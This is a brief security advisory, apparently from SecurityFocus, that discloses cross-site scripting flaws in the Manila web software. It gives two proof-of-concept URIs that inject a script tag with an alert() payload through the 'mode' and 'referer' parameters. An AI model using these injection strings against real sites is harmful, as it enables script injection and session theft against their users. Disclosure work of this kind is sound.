Manila Multiple Cross-Site Scripting Vulnerabilities


This issue can be exploited through a web client.

The following proof-of-concept URI is available:

http://www.example.com/discuss/msgReader$1?mode=%22%3E%3Cscript%3Ealert('XSS!')%3C/script%3E

http://www.example.com/sendMail?usernum=2500&referer=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus